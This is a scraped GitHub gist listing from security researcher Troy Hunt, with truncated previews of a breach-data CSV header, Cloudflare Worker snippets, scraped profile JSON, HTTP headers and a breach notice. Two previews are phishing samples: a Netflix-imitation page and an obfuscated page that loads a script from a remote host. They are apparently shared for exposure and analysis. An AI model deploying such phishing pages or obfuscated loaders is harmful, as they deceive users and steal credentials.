Skip to content

Instantly share code, notes, and snippets.

View UsersData.csv
Id MapID UserID AddressId Fax Lat Lon Sex Tel Tel2 Email Notes State Title Banned LastIP Status URLName AddrCity AgeRange LastName NickName Services FirstName InitialIP LastLogin RFDIssuer RFDNumber TelMobile TermsText TermsWhen AddrCounty Categories EmailOptIn Facilities ImageCount ModifyTime TradeTypes TraderType WebAddress AddrCountry AddrStreet1 AddrStreet2 AddrStreet3 BillStreet1 ConfirmHash Description LastBrowser ShowAddress TermsAgreed AddrPostcode BillPostCode CreationTime HideStockNos InvoiceEmail Organization PasswordHash DefaultAdText PasswordScore EmailValidated MarketingOptIn SpecialBilling DistancePostcode MarketingOptTime EmailValidationString
@troyhunt
troyhunt / rick-roll-content-scraper.js
Created Aug 19, 2020
A Cloudflare worker to redirect image requests from dickhead content scraper's site to a Rick Roll
View rick-roll-content-scraper.js
addEventListener('fetch', event => {
event.respondWith(fetchAndApply(event.request))
})
async function fetchAndApply(request) {
let response = await fetch(request)
let referer = request.headers.get('Referer')
let contentType = response.headers.get('Content-Type') || ''
if (referer && contentType.startsWith('image/')) {
View troys-been-scraped.json
{
"_id": {
"$oid": "5b9f0ec2385f0a00655c92fb"
},
"email": "troyhunt@hotmail.com",
"emails": [
{
"local": "troyhunt",
"domain": "hotmail.com",
"type": "personal",
@troyhunt
troyhunt / uniform-urls.js
Created Sep 4, 2018
Cloudflare Worker to normalise URLs for cache efficiency
View uniform-urls.js
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request));
})
/**
* Fetch request after making casing of hash prefix uniform
* @param {Request} request
*/
async function handleRequest(request) {
@troyhunt
troyhunt / roblox.html
Created Jul 30, 2018
Roblox response to an insecure request
View roblox.html
HTTP/1.1 200 OK
Server: nginx/1.13.12
Date: Mon, 30 Jul 2018 00:34:29 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-DIS-Request-ID: 92ff365aa7add940416ef2364da35e97
P3P: CP="NON DSP COR ADMa OUR IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Length: 1557
View expanded-phishing-file.html
<title>Netflix</title>
<meta content="" name="keywords">
<meta content="" name="description">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<link type="text/css" rel="stylesheet" href="css/z.css">
<link type="text/css" rel="stylesheet" href="css/a.css">
<link rel="shortcut icon" href="img/nficon2015.ico">
View encrypted-phishing-file.html
<html><head><script src="http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/hok.js"></script><script>
var hea2p =
('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz');
var hea2t =
'KgBJ+ZS2yFkzpqil0wIAWkAArBLQmGfqRlP/tHYU3SbrxI32eAoeR7vT4aptN4OYOH/OVmxcOwmBUPd5B7b5JTBjDn1JUiTkkcqZ9zTfsQ8c6y/VZ5Njhw78CB/2Da7s23CEOUhpO8Ybbh5MsLp8pMKpb/Aw1tvXQs+GVXTBxIIn60Y5j50pRl3fxb7aPmFzR6oX7TdcUBVK1TnA4t4LQEW3xepm5yamhE6LRr0WOE9+GyLWNynAMzjj1IkWq1fYBcihI2mhTT73fNseM9ThQjv0lUzAsNcHIzIo+OtUI0V/uZXFKwXRxmzTq45D3LVI5bDaE/9i6XpoKSxnJsgQgVAogTVEBxs8+l2bvdYOGacGO6uCeRE+GsdaQDLoU/XXRsZERPfXqFrNSLCWqNX5961i8iVNT8YVaEIujSKpHTemQ29xV9CuFGm87mAiBnkMfxoXn+zGtunikqUuV96zy4YEEzoRIDKct+AxBp6pAfmH1FG5QTYnQHTLnMWBzGVlE7Bs2I0hIlJ8cuP8XFnm9PsPzznl+GtuhONMCHDB4xEUl+2gnqUNHABcvkmKn+66H79Irg8s237YayOExtq0mBxhFBqhYywlr7clIERuYMqpTiF5X4nkB0xY8cHx01P4b7OR3u4D8x7i+4xry/wqR0pVWUUhg5sQiO8WCbBBL1HcxkUXcoYd6QKCCez3PqFzMMFRBk+xubr8v8BycDes/1Wibz9N6h7kg78EPV7sGD7qfm7arUua8eUSdQw8Txj7a3CY
@troyhunt
troyhunt / mountain-training-breach-notice
Created Nov 23, 2016
A very well written breach notice from Mountain Training
View mountain-training-breach-notice
Dear [redacted],
This email is being sent to you about a recent security breach to Mountain Training's website and has been sent using Mail Chimp instead of our candidate management system. The reason for this is explained below.
Our candidate management system, powered by TahDah, recently suffered a security breach and I want to reassure you straightaway that no passwords, bank or card details have been accessed, or ever can be. On the evening of Saturday 12th November, someone gained unauthorised access to the website of our candidate management system via the admin account of a TahDah staff member. The database, which sits behind the website, was not accessed. The unauthorised person(s) replaced the log in page so that no one could gain access to the website and sent an email to ‘All candidates’ which contained a malicious link.
The staff of Mountain Training and our database developer TahDah responded very quickly and were able to intercept the email, so that it was sent to a relatively small percentag